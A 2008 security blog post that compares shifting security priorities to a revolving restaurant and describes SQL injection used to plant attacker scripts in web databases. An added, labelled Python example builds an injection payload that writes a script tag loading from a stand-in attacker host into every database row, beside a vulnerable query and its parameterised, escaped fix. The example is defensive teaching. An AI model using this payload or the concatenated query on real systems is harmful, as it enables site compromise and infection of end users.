Bright Stove

Reflecting information risk journey

Revolving security


Revolving restaurants are often a hit with children. They are also attractions for adults, but mostly on special occasions; otherwise they are often expensive places to dine. The two groups, however, are intrigued by different aspects of the technology at the centre of the concept. Adults like that the restaurant provides a panoramic view of the area: the scenery changes through the all-glass window as the restaurant revolves around the axle of the tall tower. Children, as I observed and experienced as a kid, are mostly intrigued by the internal changes that result from the movement. The food serving area, in particular, is next to the table at one moment and has moved away at another, creating opportunities for hide-and-seek type games and chasing around. For both groups, the cost and the contents (i.e., the food) are not the main part of the experience.
Information security issues are like a revolving restaurant in many regards. People and organizations look at them from different perspectives, depending on whether they are sitting by the window or near the revolving axle where the food and drinks are served, and also on their maturity or awareness level, i.e., the different views through the windows as the restaurant revolves. For example, government organizations tend to focus on the confidentiality of information because of their knowledge of, and concerns over, national security. People in general worry about their privacy once they know it can be compromised and stolen; otherwise they worry more about viruses and malware, because they have been hurt by them before. Private enterprises tend to focus on access controls, since these are easier and less costly to implement than protecting the content itself. Enterprises also worry about malware and viruses, since most of them have been hurt by such attacks as well. Which technologies are deployed, and when, depends on the area of focus (i.e., where they sit). Nobody, however, likes the cost and effort involved in implementing information security. Except for information security professionals, most users and organizations care even less about the elegance and innovation in information security technology (i.e., the food and drinks).
This week, in Hong Kong, I was invited to speak at four security gatherings, and also met with a few senior people to discuss security policy and strategy issues and solutions. Since the beginning of the year, there has been a series of incidents relating to information breaches: a HK singer/actor's personal files were compromised by a computer repair technician and shared online; a bank had a server stolen from a branch, leaving 159,000 customer records in an "unknown" status; a government department lost private data; and public hospital staff lost a USB thumb drive in a taxi containing 10,000 patient records. So, naturally, sitting next to a window with such a view revolving in front of Hongkongers, the focus is on information protection now.
Virus attacks, malware infections, and even the current wave of web application attacks that use SQL injection but target end users as the ultimate victims have attracted less interest from these audiences (since they are not sitting next to the food and drinks, where I sit). The last of these is in fact an emerging risk that is already affecting many web sites in the Asia Pacific and Greater China regions. Many web site owners do not even know that their sites have been compromised, because the attackers are clever in their tactics. They use SQL injection to gain access to the database server. Instead of corrupting, modifying, or retrieving information from the database, they write their exploit code (for example, a reference to a script hosted on a site under their control) into the database content. When the web application is later accessed by end users, normally the customers of the organization involved, the stored exploit code is served out by the application in the usual manner, and the end user's system is infected and becomes the victim if it lacks protection against that exploit. The server itself keeps working normally, which is why the compromise goes unnoticed: the only visible symptom is attacker-supplied content in pages that render fields from the database. For those of you who are responsible for securing your organization's web servers, or who are concerned about this attack and want to make sure your web sites are secure against it, there are a few useful URLs that provide guidance on how to do so.
These attacks do not capitalize on new security loopholes. They are known, old problems of input validation that have revolved back into our view, presented in a slightly different manner.
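The mechanism described above, as an added example that is not part of the original post and not code from any of the affected sites: a profile update built by string concatenation lets one user's input escape the string literal and rewrite the WHERE clause, so a script tag lands in every member's record and is then served to all visitors. The table, the member names and the attacker URL (attacker.example) are constructed for illustration. The hardened version binds the input as a parameter, so the payload stays in the attacker's own row as inert text, and escapes on output, so even that text cannot become markup.

```python
import html
import sqlite3

# Hypothetical attacker-controlled script location, used only to build the payload.
SCRIPT = '<script src="http://attacker.example/x.js"></script>'

# The injection string one user submits as their new display name. The quote
# closes the literal, "WHERE 1=1" widens the update to every row, and "--"
# comments out the application's own WHERE clause.
PAYLOAD = SCRIPT + "' WHERE 1=1 --"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a small in-memory members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER PRIMARY KEY, display_name TEXT)")
    conn.executemany(
        "INSERT INTO members (id, display_name) VALUES (?, ?)",
        [(1, "alice"), (2, "bob"), (3, "mallory")],
    )
    conn.commit()
    return conn


def update_name_vulnerable(conn: sqlite3.Connection, member_id: int, new_name: str) -> None:
    # String concatenation: the user's input becomes part of the SQL text.
    sql = ("UPDATE members SET display_name = '" + new_name
           + "' WHERE id = " + str(member_id))
    conn.execute(sql)
    conn.commit()


def update_name_safe(conn: sqlite3.Connection, member_id: int, new_name: str) -> None:
    # Parameterised query: the input is bound as data and never parsed as SQL,
    # so the quote and the trailing "WHERE 1=1 --" are just characters.
    conn.execute("UPDATE members SET display_name = ? WHERE id = ?",
                 (new_name, member_id))
    conn.commit()


def names(conn: sqlite3.Connection) -> list:
    return [n for (n,) in conn.execute("SELECT display_name FROM members ORDER BY id")]


def render_vulnerable(conn: sqlite3.Connection) -> str:
    # Emits stored text verbatim: whatever sits in the column reaches the browser.
    return "".join(f"<li>{name}</li>" for name in names(conn))


def render_safe(conn: sqlite3.Connection) -> str:
    # HTML-escapes on output, so stored text is displayed, not executed.
    return "".join(f"<li>{html.escape(name)}</li>" for name in names(conn))


def demo_vulnerable() -> tuple:
    """Mallory (id 3) edits her own profile; every member's name becomes the script tag."""
    conn = make_db()
    update_name_vulnerable(conn, 3, PAYLOAD)
    return names(conn), render_vulnerable(conn)


def demo_safe() -> tuple:
    """Same input against the hardened code: only row 3 changes, and only as text."""
    conn = make_db()
    update_name_safe(conn, 3, PAYLOAD)
    return names(conn), render_safe(conn)


if __name__ == "__main__":
    stored, page = demo_vulnerable()
    print("vulnerable rows:", stored)
    print("vulnerable page:", page)
    stored, page = demo_safe()
    print("safe rows:      ", stored)
    print("safe page:      ", page)
```

The two fixes are independent and both are needed: parameterisation stops the database from being rewritten, while output escaping stops any text that does reach the database, by this or any other route, from being served to customers as live markup.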
Reflecting on these developments, they remind us of the importance of defense-in-depth: not simply building layers of defenses, but making sure that we look into the security needs of every layer. Increasingly, the proliferation of information devices has made information, or data, the window view that we see. Protecting it, however, requires action at the other layers at the same time: application, operating system, network, physical, and people. While we enjoy the panoramic view presented at the revolving restaurant, we should also enjoy the food and drinks to make the cost and effort worthwhile.
Happy dining!

Written by mengchow

May 23, 2008 at 6:32 am

Posted in Risk Management
